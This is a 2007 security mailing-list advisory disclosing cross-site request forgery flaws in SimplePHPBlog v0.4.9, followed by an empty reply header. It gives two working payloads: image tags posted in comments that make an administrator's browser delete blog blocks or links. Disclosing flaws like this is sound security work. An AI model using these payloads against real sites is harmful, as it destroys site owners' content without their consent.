Multiple CSRF in SimplePHPBlog Oct 17 2007 02:00PM
deme hackish eu (1 replies)
SimplePHPBlog

Cross Site Request Forgeries

Tested on v0.4.9

Discovered by: Demential

Web: http://hackish.altervista.org

E-mail: deme [at] hackish [dot] eu

SimplePHPBlog website: http://www.simplephpblog.com/

- posting [img=add_block.php?action=delete&block_id=*] in a comment

where * is an ID of a block,

when administrator reads the comment

block * will be erased.

- posting [img=add_link.php?action=delete&link_id=*] in a comment

where * is an ID of a link,

when administrator reads the comment

link * will be erased.

[ reply ]
Re: Multiple CSRF in SimplePHPBlog Oct 17 2007 07:27PM
Hanno Böck (ml hboeck de)


 

Privacy Statement
Copyright 2010, SecurityFocus